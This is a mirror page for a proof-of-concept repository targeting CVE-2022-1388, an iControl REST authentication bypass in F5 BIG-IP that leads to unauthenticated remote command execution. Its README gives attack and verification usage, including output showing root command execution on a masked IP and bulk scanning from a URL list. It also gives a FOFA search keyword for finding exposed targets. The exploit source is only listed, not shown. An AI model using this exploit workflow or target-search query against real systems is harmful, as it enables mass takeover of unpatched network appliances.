CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source

https://github.com/saucer-man/CVE-2022-1388

Associated Vulnerability

Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated

Description

CVE-2022-1388

Readme

# CVE-2022-1388

F5 BIG-IP Unauthenticated RCE Vulnerability

F5 BIG-IP iControl REST身份验证绕过RCE漏洞

`fofa keywords: title="BIG-IP&reg;- Redirect"`

## usage

- attack

```
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx
[+] https://203.xxx.xxx.xxx is vulnerable
[input your command]: id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[input your command]: whoami
root
[input your command]: 

```

- verify:

```
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx --verify
[+] https://203.xxx.xxx.xxx is vulnerable

$ python3 cve-2022-1388.py -f url.txt                                               
[+] https://203.xxx.xxx.xxx is vulnerable
```

## refer

- https://support.f5.com/csp/article/K23605346
- https://twitter.com/_0xf4n9x_/status/1523639281532620800

File Snapshot


 [4.0K]  /data/pocs/4e2082a59ec29fcebe17a29a6a7e5ba5445b4333
├── [2.6K]  cve-2022-1388.py
└── [ 815]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!